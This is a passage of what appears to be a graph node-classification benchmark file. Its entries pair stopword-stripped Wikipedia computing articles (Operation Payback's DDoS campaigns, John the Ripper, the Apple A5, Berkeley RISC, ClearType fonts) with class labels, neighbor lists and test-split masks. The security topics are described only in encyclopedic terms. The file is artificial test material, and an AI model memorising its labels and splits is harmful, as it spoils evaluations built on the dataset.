bay causes october 18 2010 acapor website defaced presenting text operation payback redirect pirate bay seconds addition defacing website copy email database acapor uploaded pirate bay leaked e-mails far revealed acapor methods denunciation dissatisfaction portuguese government justice system perception copyright debate war antagonism isps acapor claimed business isps illegal downloading october 4 2010 operation payback launched attack ministry sound website gallant macmillan website october 7 2010 attacked website spanish copyright society sgae.es october 7 2010 total downtime websites attacked operation payback 537.55 hours october 15 2010 copyprotected.com sql injected defaced three days later operation payback launched ddos attack uk intellectual property office production companies satelfilm.at wega-film.at hit drive-by ddoses october 21 2010 response efforts gain court injunction isp refused block movie-streaming website operation payback knocked porn website hustler.com offline following day 2010 mipcom convention gene simmons kiss stated response simmons comments members operation payback switched attentions two websites simmonsrecords.com genesimmons.com taking offline total 38 hours point course ddos genesimmons.com hacked redirected thepiratebay.org response attack simmons wrote led additional attacks subsequently downtime websites later simmons message removed website one year later december 2011 person supposedly known nickname spydr101 arrested relation attack genesimmons.com charged conspiracy unauthorized impairment protected computer october 26 2010 limewire ordered disable searching downloading uploading file trading and/or file distribution functionality losing court battle riaa claims copyright infringement satisfied injunction riaa announced intention continue arista records llc v. lime group llc trial recover damages caused program retaliation members operation payback announced would attack riaa website october 29 despite fact group typically hit target twice october 29 riaa.org indeed taken offline via denial-of-service attack attack riaa.com riaa.org sites inaccessible europe operation payback main site attacked later day subsequently moved website tieve.tk anonops.net damages phase limewire trial riaa attempted switch seeking statutory damages per-work seeking per-infringement quote total damage amount method calculating number infringements judge case rejected proposal holding case law supported statutory damages per-work basis large-scale infringement thus capping potential award 1.5 billion march 15 2011 four days ruling report appeared law.com highlighting judge remark per-infringement award sought record companies might total trillions report estimated 75 trillion attention-grabbing headline usa nominal gdp 2012-2013 16–17 trillion figure repeated pc magazine march 23 operation payback call-to-arms followed citing 75 trillion figure still actively sought riaa ddos attack riaa website commenced march 25 around october 28 2010 group set new website intention coordinating protests around world raise awareness cause date protest activities november 5 intended day gunpowder plot anonymous heavily affiliates use guy fawkes masks protest activity included attack united states copyright office fbi launched investigation later arrested one person accused taking part attack paypal november 9 2010 operation payback temporarily ceased attacking websites hiatus lasted four months ending early march 2011 attack temporarily took website bmi prominent collection society operating behalf music publishers followed aforementioned second attack riaa website december 8 2010 u.s politician sarah palin announced website personal credit card information compromised palin team believed attack executed anonymous though anonymous never commented palin possible target attack interview rt anonymous member said n't really care sarah palin much honest n't really know trying accomplish attention trying gain personally n't care sarah palin palin technical team posted screenshot server log file showing wikileaks.org url visa attacks denial service attacks credit card data compromised unknown whether palin card compromised part broad attack visa specific attack palins palin email previously hacked campaigning 2008 u.s. presidential election december 2010 wikileaks came intense pressure stop publishing secret u.s. diplomatic cables corporations amazon paypal bankamerica swiss bank postfinance mastercard visa either stopped working froze customers donations wikileaks due political pressures response behind operation payback directed activities companies operation payback launched ddos attacks paypal postfinance swedish prosecution authority december 8 2010 coordinated ddos attack operation payback brought mastercard visa websites december 9 2010 prior sustained ddos attack paypal website caused minor slowdown service paypal announced blog would release frozen funds account wau holland foundation raising funds wikileaks would reactivate account regarding attacks wikileaks spokesman kristinn hrafnsson denied relation group said neither condemn applaud attacks believe reflection public opinion actions targets day 16-year-old boy arrested hague netherlands connection distributed denial-of-service attacks mastercard paypal boy irc operator nickname jeroenz0r december 10 2010 daily telegraph reported anonymous threatened disrupt british government websites assange extradited sweden anonymous issued press release attempt clarify issue electronic frontier foundation co-founder john perry barlow described attacks shot heard round world—this lexington following list sites domains known targeted operation payback attempt take amazon.com aborted failed recruit enough users botnet cnn noted massive amazon website almost impossible crash late december fbi began raid suspected participants operation payback beginning 2011 operation payback brought zimbabwean government websites zimbabwean president wife sued newspaper 15 million publishing wikileaks cable linked alleged trade illicit diamonds january 27 2011 five males aged 15 26 arrested early morning raids u.k. suspicion involvement fbi executed 40 search warrants day united kingdom intellectual property office said site attacked responsible depriving citizens access information democratic right access critics claimed attacks restricted gene simmons right free speech spokesman mpaa said troubling groups seem concerned rights steal copy films music books creative resources rights american workers producing products also criticism pirate party uk united states pirate party joint public statement urged group immediately cease distributed denial-of-service ddos attacks instead seek legal method express frustration disquiet copyright industry perversions copyright law personal gain acknowledging ddos attacks credit card banking web sites serve political protests cyber experts said operation payback done long-term damage sites back online attacks penetrated brought entire banking systems used conduct transactions people still continuing use credit cards make payments like noisy political demonstration like mob surrounding bank refusing let anyone said one cyber expert operation payback members used modified version low orbit ion cannon loic execute ddos attacks september 2010 hive mind mode added loic hive mind mode loic connects irc controlled remotely allows computers loic installed behave part botnet utilising tool coordinators operation payback able quickly take websites belonging anti-piracy groups botnets sizes also used members operation payback reportedly used irc channel communicate targets select instructions attacking targets produced posted various imageboards 4chan/7chan/711chan/420chan/808chan media twitter facebook also utilized coordination december 8 2010 operation payback facebook page removed official twitter account suspended additionally federal court order forced encyclopedia dramatica delete operation payback article featured detailed history operation including personal information individuals associated companies attacked october 2013 13 members operation payback indicted federal court alexandria virginia co-conspirators violation 18 u.s.c § 731 18 u.s.c § 1030 2014 members received plea deal reducing felony charges single misdemeanor",
    "neighbors": [
      1024,
      5636,
      5133,
      4117,
      8726,
      535,
      9761,
      4644,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      7798,
      10875,
      3711,
      8320,
      5251,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      11437,
      9904,
      9395,
      8886,
      202,
      6347,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      4940,
      6484,
      857,
      1882,
      7515,
      9055,
      2409,
      3956,
      9082,
      2945,
      899,
      11152,
      10132,
      1946,
      1440,
      5024,
      5028,
      3495,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      8640,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507,
      9727
    ],
    "mask": "Test"
  },
  {
    "node_id": 4134,
    "label": 9,
    "text": "Lennart_Augustsson:lennart augustsson lennart augustsson swedish computer scientist previously lecturer computing science department chalmers university technology research field functional programming implementations functional languages augustsson worked carlstedt research technology sandburst credit suisse standard chartered bank facebook currently employed x company augustsson author also co-developer thomas johnsson lazy ml functional programming language developed early 1980s prior miranda haskell lml strongly typed statically scoped implementation ml lazy evaluation key innovation lml demonstrate compile lazy functional language lazy languages implemented via interpreted graph reduction lml compiled g-machine code augustsson intimately involved early lpmud development lpmud driver cd mudlib mud community pseudonym marvin augustsson written three winning entries international obfuscated c code contest",
    "neighbors": [
      3876,
      8262,
      6536,
      7144,
      7019,
      7386,
      5885
    ],
    "mask": "None"
  },
  {
    "node_id": 4135,
    "label": 5,
    "text": "Tabular_Data_Stream:tabular data stream tabular data stream tds application layer protocol used transfer data database server client initially designed developed sybase inc. sybase sql server relational database engine 1984 later microsoft microsoft sql server early development sybase sql server developers sybase perceived lack commonly accepted application-level protocol transfer data database server client order encourage use products sybase promoted use flexible pair libraries called codice_1 codice_2 implement standard sql library included order implement bulk copy called blk codice_1 job ferry data two computers underlying network protocol codice_2 provides api client program communicates server via codice_1 codice_2 sends server structured stream bytes meant tables data hence tabular data stream codice_7 provides like codice_2 api client programs communicates server via codice_1 1990 sybase entered technology-sharing agreement microsoft resulted microsoft marketing sql server — microsoft sql server — based sybase code microsoft kept codice_2 api added odbc microsoft since added additional apis time sybase introduced powerful successor codice_2 called codice_12 called pair open client codice_2 though officially deprecated remains widespread use tds protocol comes several varieties openly documented regarded proprietary technology exception tds 5.0 used exclusively sybase documentation available sybase situation changed microsoft published tds specification 2008 part open specification promise freetds team developed free native-library implementation tds protocol licensed lgpl license wireshark protocol decoder tds oracle corporation provides oracle net software analogous tds",
    "neighbors": [
      9286,
      4490,
      1964,
      10413,
      270,
      5104,
      2804,
      10518,
      11030
    ],
    "mask": "Test"
  },
  {
    "node_id": 4136,
    "label": 9,
    "text": "Family_BASIC:family basic family basic famicom basic consumer product programming nintendo family computer video game console japan family basic launched june 21 1984 consumers japan nintendo cooperation hudson soft sharp corporation second version titled family basic v3 released february 21 1985 greater memory new features first edition family basic application cartridge bundled computer style keyboard instructional textbook requires cassette tape recorder save user-generated basic programs programs saved using cassette tape drive famicom data recorder family basic designed compatible floppy disk storage famicom disk system disk system ram adapter requires use famicom cartridge slot prevents using slot family basic cartridge family basic includes dialect basic programming language enhanced game development microsoft basic-derived command set extended support sprites animation backgrounds musical sequences gamepads several visual components seen nintendo games backgrounds characters mario donkey kong series games made available family basic development componentry appear premade family basic games family basic normally used nes consoles console lacks famicom 15-pin expansion port circumvented use custom i/o adapter hooks otherwise unused nes expansion port bottom console 1990 manufacturer shenzhen named nedc developed sold clone famicom family basic china first model called fcs-90 combines famicom chipset cartridge slot pair controllers rf output making complete console used program play famicom video games nedc also translated built-in software english fcs-90 revised model fcs-92 instruction manual section programming japanese popular music family basic developed koji kondo second nintendo product tenure kondo previously initiated computer audio interests programming sounds basic home computer satoshi tajiri creator pokémon initially used family basic gateway build understanding internal operation famicom inspired create handmade famicom game development hardware make game freak debut game quinty later released mendel palace 1990",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      10784,
      3233,
      11683,
      5925,
      6949,
      8101,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      6845,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      6878,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5617,
      4211,
      5747,
      5237,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 4137,
    "label": 2,
    "text": "Object-oriented_user_interface:object-oriented user interface computing object-oriented user interface ooui type user interface based object-oriented programming metaphor ooui user interacts explicitly objects represent entities domain application concerned many vector drawing applications example ooui – objects lines circles canvases user may explicitly select object alter properties size colour invoke actions upon move copy re-align business application ooui user may selecting and/or invoking actions objects representing entities business domain customers products orders jakob nielsen defines ooui contrast function-oriented interfaces object-oriented interfaces sometimes described turning application inside-out compared function-oriented interfaces main focus interaction changes become users data information objects typically represented graphically screen icons windows dave collins defines ooui demonstrating three characteristics jef raskin suggests important characteristic ooui adopts 'noun-verb rather 'verb-noun style interaction several advantages terms usability great deal potential synergy ooui concept important ideas user interface design including many futuristic imaginings user interfaces rely heavily ooui especially oogui concepts however many examples user interfaces implement one ideas fact oouis though often wrongly labelled oouis conversely examples oouis neither graphical employ direct manipulation techniques employ strong metaphors example earliest versions smalltalk programming language command line interface nonetheless also clearly ooui though subsequently became better known pioneering role development guis direct manipulation visual metaphors although many conceptual parallels oouis object-oriented programming follow ooui implemented using object-oriented programming language guidelines ibm common user access cua possibly comprehensive attempt defining standard ooui design stated 'while object-oriented programming facilitate development object-oriented user interface pre-requisite object-oriented user interface developed traditional programming languages tools however strong synergies larry tesler left xerox parc 1980 join apple underlined relationship also obvious synergy concept ooui idea constructing software domain objects however follow objects user sees interacts within ooui correspond domain objects application built cua guidelines stated 'in object-oriented user interface objects user works necessarily correspond objects modules code programmer used create product basic design methods described cua refined ovid method used uml model interface mark van harmelen states 'object-oriented user interface design require designers take object-oriented view problem beginning project furthermore even designers take object-oriented perspective throughout benefit focusing separately object model object-oriented user interface design contrast naked objects pattern approach design applications least naive form enforces direct correspondence objects represented ooui underlying domain objects auto-generating former latter",
    "neighbors": [
      10289,
      4114,
      8524
    ],
    "mask": "None"
  },
  {
    "node_id": 4138,
    "label": 2,
    "text": "Candara:candara candara humanist sans-serif typeface designed gary munch commissioned microsoft part cleartype font collection suite fonts various designers released windows vista starting letter c reflect designed work well microsoft cleartype text rendering system others calibri cambria consolas corbel constantia candara ’ verticals show entasis ekstasis opposite sides stems high-branching arcades lowercase large apertures open forms unique ogee curves diagonals italic includes many calligraphic serif font influences common modern sans-serif typefaces calibri corbel family similar designs spacing family supports wgl4 character set opentype features include automatic ligature sets numerals tabular proportional oldstyle lining numerator denominator scientific inferior subscripts small caps also distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac available freeware use operating systems gnu/linux cross-platform use web use",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      2221,
      4141,
      1487,
      6797,
      3538,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "None"
  },
  {
    "node_id": 4139,
    "label": 3,
    "text": "Apple_A5:apple a5 apple a5 32-bit system-on-a-chip designed apple inc. manufactured samsung successor apple a4 a5 commercially debuted release apple ipad 2 tablet also powers iphone 4s ipod touch fifth generation apple tv third generation ipad mini first generation consistent apple debuted a4 chip first original ipad followed iphone 4 ipod touch fourth generation apple claims compared predecessor a4 a5 cpu twice work gpu nine times graphics performance software updates devices using chip ceased 2016 release ios 10 a5 consists dual-core arm cortex-a9 cpu neon simd accelerator dual core powervr sgx543mp2 gpu apple lists a5 clocked 1 ghz ipad 2 technical specifications page though dynamically adjust frequency save battery life unit used iphone 4s clocked approximately 800 mhz apple also included image signal processor unit isp advanced image post-processing face detection white balance automatic image stabilization earsmart unit audience noise canceling a5 first released estimated time cost 75 previous generation difference expected diminish production increased a5 manufactured samsung austin texas factory samsung invested 3.6 billion austin facility produce chips processors nearly facility output dedicated apple components samsung invested 4.2 billion austin facility order transition 28 nm fabrication process second half 2013 a5 part model numbers s5l8940 45 nm version s5l8942 32 nm version s5l8947 32 nm single core version version a5 wider memory subsystem four graphic cores called apple a5x found third generation ipad apple uses first version a5 chip iphone 4s ipad 2 a5 manufacturing process 45 nm 122.2 mm die area manufactured package package pop together 512 mb dual-channel lp-ddr2 dram apple used second version a5 chip third generation apple tv announced march 7 2012 well ipod touch fifth generation ipad mini 32 nm revision ipad 2 chip manufactured 32 nm fabrication process id code s5l8942 one core disabled apple tv new a5 measures nearly 41 smaller first-generation a5 coming 69.6 mm manufactured package package pop together 512 mb lpddr2 dram march 2013 apple released updated version third generation apple tv appletv3,2 containing smaller single cpu core single gpu core version a5 processor unlike a5 variants version a5 package-on-package pop stacked ram chip small 37.8 mm decrease size due decrease feature size still 32 nm fabrication process indicates a5 revision new design markings tell named apl7498 software chip called s5l8947 images illustrations approximately scale",
    "neighbors": [
      7170,
      10755,
      9732,
      5647,
      8720,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      1563,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      7211,
      6700,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      8253,
      7745,
      1090,
      7235,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      11374,
      2673,
      6258,
      10357,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      1170,
      7830,
      6807,
      5784,
      1177,
      666,
      5786,
      3228,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      4807,
      9928,
      4810,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      9451,
      1772,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      10548,
      11062,
      7991,
      1849,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      1346,
      8003,
      10562,
      6981,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      8109,
      10675,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      4569,
      8665,
      2524,
      7133,
      9182,
      4068,
      487,
      2023,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4140,
    "label": 4,
    "text": "John_the_Ripper:john ripper john ripper free password cracking software tool initially developed unix operating system runs fifteen different platforms eleven architecture-specific versions unix dos win32 beos openvms one popular password testing breaking programs combines number password crackers one package autodetects password hash types includes customizable cracker run various encrypted password formats including several crypt password hash types commonly found various unix versions based des md5 blowfish kerberos afs windows nt/2000/xp/2003 lm hash additional modules extended ability include md4-based password hashes passwords stored ldap mysql others sample output debian environment first line command expand data stored file codice_1 next line contents file i.e user codice_2 hash associated user codice_3 third line command running john ripper utilizing codice_4 flag codice_5 name text file full words program use hash codice_1 makes another appearance file want john work see output john working loaded 1 password hash — one saw cat command — type hash john thinks traditional des also see attempt required one guess time 0 100 guess rate one modes john use dictionary attack takes text string samples usually file called wordlist containing words found dictionary real passwords cracked encrypting format password examined including encryption algorithm key comparing output encrypted string also perform variety alterations dictionary words try many alterations also used john single attack mode modifies associated plaintext username encrypted password checks variations hashes john also offers brute force mode type attack program goes possible plaintexts hashing one comparing input hash john uses character frequency tables try plaintexts containing frequently used characters first method useful cracking passwords appear dictionary wordlists takes long time run",
    "neighbors": [
      7426,
      6916,
      7556,
      7557,
      6797,
      10135,
      2716,
      4514,
      8867,
      3629,
      7983,
      63,
      8513,
      6098,
      8787,
      6617,
      3290,
      4956,
      4445,
      733,
      7135,
      3937,
      5612,
      7022,
      8827,
      3826,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 4141,
    "label": 2,
    "text": "Consolas:consolas consolas monospaced typeface designed luc de groot part suite fonts take advantage microsoft cleartype font rendering technology included windows since windows vista microsoft office 2007 microsoft visual studio 2010 available download microsoft standard windows vista font slash zero character consolas supports following opentype layout features stylistic alternates localized forms uppercase-sensitive forms oldstyle figures lining figures arbitrary fractions superscript subscript although consolas designed replacement courier new 713 glyphs initially available compared courier new 2.90 1318 glyphs version 5.22 included windows 7 support greek extended combining diacritical marks symbols number forms arrows box drawing geometric shapes added version 5.32 total number supported glyphs 2735 font along calibri cambria candara corbel constantia also distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac consolas also available licensing ascender corporation bare bones software licensed font ascender use text editor bbedit inconsolata open source alternative available google fonts",
    "neighbors": [
      6797,
      1435,
      4127,
      2593,
      2978,
      4130,
      7973,
      1191,
      4138,
      2221,
      4146,
      4148,
      8374,
      9654,
      10432,
      9539,
      1098,
      1487,
      3538,
      8422,
      8701
    ],
    "mask": "Test"
  },
  {
    "node_id": 4142,
    "label": 7,
    "text": "TradeGecko:tradegecko tradegecko singapore based software-as-a-service company develops online inventory order management software targeted smes company recognised one innovative business-to-business software providers red herring asia 100 tradegecko launched 2013 carl thompson brothers cameron bradley priest three new zealanders thompson ran label crowded elevator saw need solution managing inventory administration made decision create one “ running clothing label exciting enjoyed lot grew fast amount administration quickly overwhelmed us ’ find solution pull together spreadsheets manual data processing turned absolute nightmare said trio went jfdi.asia accelerate program going raise round financing singapore-based investors april 2015 tradegecko raised 6.5 million series round led nsi ventures jungle ventures tradegecko provides inventory management platform targeted wholesalers online retailers system also integrates cloud based software shopify e-commerce woocommerce e-commerce xero accounting software designed help businesses manage sales supply chains inventory control customer supplier tracking intelligence reports customers able generate sales purchase orders create reports track inventory multiple warehouses tradegecko also released mobile tablet apps system",
    "neighbors": [
      4194,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 4143,
    "label": 2,
    "text": "CAPICOM:capicom capicom discontinued activex control created microsoft help expose select set microsoft cryptographic application programming interface cryptoapi functions microsoft component object model com intended enable every environment supports activex use microsoft cryptographic technologies including web pages opened microsoft internet explorer web browser supports activex capicom used digitally sign data inspect verify display digital signature digital certificate add remove certificates certificate stores finally encrypt decrypt data capicom version 2.1.0.3 latest last version capicom officially supported windows vista however microsoft announced capicom discontinued longer developed microsoft suggests replacing capicom .net framework x509 cryptographic classes number alternatives capicom included windows 7 linked microsoft article goes detail",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 4144,
    "label": 3,
    "text": "Berkeley_RISC:berkeley risc berkeley risc one two seminal research projects risc-based microprocessor design taking place arpa vlsi project risc led david patterson coined term risc university california berkeley 1980 1984 project took place short drive away stanford university mips effort starting 1981 running 1984 berkeley project successful became name similar designs follow even mips would become known risc processor berkeley risc design later commercialized sun microsystems sparc architecture inspired arm architecture risc mips developed realization vast majority programs use vast majority processor instructions one calculation found entire unix system compiled used 30 available instructions motorola 68000 much circuitry cpu dedicated decoding instructions never used risc idea include instructions really used using space used removed circuitry circuits would speed system instead risc concentrated adding many registers small bits memory holding temporary values accessed negligible cost contrasts normal main memory might take several cycles access providing registers making sure compilers actually used programs run much faster additionally speed processor would closely defined clock speed less time would spent waiting memory accesses transistor transistor risc design would outperform conventional cpu hopefully lot downside instructions removed generally performing several sub-instructions instance codice_1 instruction traditional design would generally come several flavours one added numbers two registers placed third another added numbers found main memory put result register etc risc designs hand included single flavour particular instruction codice_1 instance would always use registers operands forced programmer write additional instructions load values memory needed making risc program less dense era expensive memory real concern notably memory also much slower cpu since risc design codice_1 would actually require four instructions two loads add save machine would much memory access read extra instructions potentially slowing considerably offset degree fact new designs used large instruction word 32-bits allowing small constants folded directly instruction instead loaded separately additionally results one operation often used soon another skipping write memory storing result register program end much larger could theory run much faster instance string instructions carrying series mathematical operations might require loads memory majority numbers used would either constants instructions intermediate values registers sense technique registers used shadow memory locations registers used proxies memory locations final values group instructions determined casual observer clear risc concept would improve performance might even make worse way sure actually simulate done results definite test test every simulation showed enormous overall benefit performance design two projects risc mips differed handling registers mips simply added lots left compilers assembly-language programmers make use risc hand added circuitry cpu help compiler risc used concept register windows entire register file broken blocks allowing compiler see one block global variables another local variables idea make one particularly common instruction procedure call extremely easy implement compilers almost computer languages use system known activation record stack frame procedure—a modular unit execution—that contains address procedure called data parameters passed space result values need returned vast majority cases frames small typically three fewer inputs one outputs sometimes input reused output berkeley design register window set several registers enough entire procedure stack frame would likely fit entirely within register window case call return procedure simple extremely fast single instruction called set new block registers—a new register window—and operands passed procedure low end new window program jumps procedure return results placed window end procedure exits register windows set overlap ends results call simply appear window caller data copied thus common procedure call interact main memory greatly accelerating downside approach means procedures large numbers local variables problematic ones fewer lead registers—an expensive resource—being wasted finite number register windows design e.g eight procedures nested many levels deep register windowing mechanism reaches limit last window reached new window set another nested call procedures nested levels deep registers windows deepest call nesting level never accessed completely wasted stanford work compilers led ignore register window concept believing efficient compiler could make better use registers fixed system hardware reasoning would apply smart assembly-language programmer first attempt implement risc concept originally known gold work design started 1980 part vlsi design course then-complicated design crashed almost existing design tools team spend considerable amounts time improving re-writing tools even new tools took hour extract design vax-11/780 final design known risc published acm isca 1981 44,500 transistors implementing 31 instructions register file containing 78 32-bit registers allowed six register windows containing 14 registers additional 18 globals control instruction decode section occupied 6 die whereas typical design era used 50 role register file took space risc also featured two-stage instruction pipeline additional speed without complex instruction re-ordering modern designs makes conditional branches problem compiler fill instruction following conditional branch so-called branch delay slot something selected safe i.e. dependent outcome conditional sometimes suitable instruction case codice_4 notable number later risc-style designs still require consideration branch delay month validation debugging design sent innovative mosis service production june 22 1981 using 2 μm 2,000 nm process variety delays forced abandon masks four separate times wafers working examples arrive back berkeley may 1982 first working risc computer actually checkout board ran june 11 testing chips proved lesser performance expected general instruction would take 2 μs complete original design allotted .4 µs five times fast precise reasons problem never fully explained however throughout testing clear certain instructions run expected speed suggesting problem physical logical design worked full speed performance would excellent simulations using variety small programs compared 4 mhz risc 5 mhz 32-bit vax 11/780 5 mhz 16-bit zilog z8000 showed clearly program size 30 larger vax close z8000 validating argument higher code density cisc designs actually impressive reality terms overall performance risc twice fast vax four times z8000 programs ended performing overall amount memory access large register file dramatically improved odds needed operand already on-chip important put performance context even though risc design run slower vax made difference importance design risc allowed production true 32-bit processor real chip die using already older fab traditional designs simply could much chip surface dedicated decoder logic true 32-bit design like motorola 68020 required newer fabs becoming practical using fabs risc could largely outperformed competition february 12 2015 ieee installed plaque uc berkeley commemorate contribution risc-i plaque reads risc design ran delays work berkeley already turned new blue design work blue progressed slower gold due lack pressing need gold going fab well changeovers classes students staffing effort pace also allowed add several new features would end improving design considerably key difference simpler cache circuitry eliminated one line per bit three two dramatically shrinking register file size change also required much tighter bus timing small price pay order meet needs several parts design sped well savings due new design tremendous whereas gold contained total 78 registers 6 windows blue contained 138 registers broken 8 windows 16 registers another 10 globals expansion register file increases chance given procedure fit local storage registers well increasing nesting depth nevertheless larger register file required fewer transistors final blue design fabbed risc ii implemented risc instruction set 39,000 transistors major change include instruction-format expander invisibly up-converted 16-bit instructions 32-bit format allowed smaller instructions typically things one operands like codice_4 stored memory smaller 16-bit format two instructions packed single machine word instructions would invisibly expanded back 32-bit versions reached alu meaning changes needed core logic simple technique yielded surprising 30 improvement code density making otherwise identical program blue run faster gold due decreased number memory accesses risc ii proved much successful silicon testing outperformed almost minicomputers almost tasks instance performance ranged 85 vax speed 256 variety loads risc ii also benched famous motorola 68000 considered best commercial chip implementation outperformed 140 420 work original risc designs ended risc ii concept lived berkeley basic core re-used soar 1984 basically risc converted run smalltalk way could claimed risc ran c later similar vlsi-bam ran prolog instead smalltalk another effort spur full set chips needed build complete 32-bit workstation risc less famous influential basis commercial sparc processor design sun microsystems sparc first clearly demonstrated power risc concept shipped first sun-4s outperformed anything market led virtually every unix vendor hurrying risc design leading designs like dec alpha pa-risc sgi purchased mips computer systems 1986 large chip vendors followed working efforts like motorola 88000 fairchild clipper amd 29000 powerpc february 13 2015 ieee installed plaque oracle corporation santa clara reads techniques developed alongside idea reduced instruction set also adopted successively powerful implementations extensions traditional complex x86 architecture much modern microprocessor transistor count devoted large caches many pipeline stages superscalar instruction dispatch branch prediction modern techniques applicable regardless instruction architecture amount silicon dedicated instruction decoding modern x86 implementation proportionately quite small distinction complex risc processor implementations become blurred",
    "neighbors": [
      8450,
      1298,
      9371,
      8861,
      6815,
      1952,
      10786,
      3493,
      6311,
      8231,
      682,
      9003,
      4269,
      9391,
      2224,
      1462,
      9911,
      2623,
      9665,
      7234,
      10051,
      6084,
      709,
      3014,
      3142,
      2895,
      6607,
      11604,
      2517,
      7770,
      219,
      7269,
      2535,
      10985,
      9964,
      8048,
      4465,
      8944,
      5492,
      757,
      7286,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 4145,
    "label": 2,
    "text": "SUSE_Studio_ImageWriter:suse studio imagewriter suse studio imagewriter official tool designed create live usbs suse opensuse part suse kiwi image creation system designed ease creation liveusb system suse studio however used standard opensuse livecd iso files",
    "neighbors": [
      7983,
      3791,
      823,
      6012,
      4637
    ],
    "mask": "Test"
  },
  {
    "node_id": 4146,
    "label": 2,
    "text": "Constantia_(typeface):constantia typeface constantia serif typeface designed john hudson commissioned microsoft transitional serif design influenced eric gill ’ perpetua design development typeface began 2003 released 2006 constantia part cleartype font collection suite fonts various designers released windows vista start letter c reflect designed work well microsoft ’ cleartype text rendering system text rendering engine designed make text clearer read lcd monitors fonts suite calibri cambria candara consolas corbel constantia designed either print on-screen uses numerals text figures default seen sample image font also includes lining figures alternate style reviewing website typographica raph levien described likely “ everyone ’ favourite face suite ... highly readable roman font departing slightly classical model still manages fresh new takes inspiration perpetua ... triangular serifs bring mind chisel font enough calligraphic flavor recall palatino. ” among features design includes small capitals alternative spacing punctuation caps text numbers enclosed circles superscript subscript glyphs transitional serif design design features moderate contrast thick thin strokes nearly-vertical axis render well cleartype letters q slightly squared-off distributed microsoft excel viewer microsoft powerpoint viewer microsoft office compatibility pack microsoft windows open xml file format converter mac use operating systems gnu/linux cross-platform use web use available freeware explaining name hudson wrote “ ’ remember possible names came ended rejected international trademark searches ... ’ singing psalms vespers noticed word constantia hey thought starts c ” writing 2011 hudson commented “ actually ’ like name constantia much every time see sea birds dock ’ waiting ferry wish ’ thought call cormorant ”",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      6797,
      3538,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "None"
  },
  {
    "node_id": 4147,
    "label": 2,
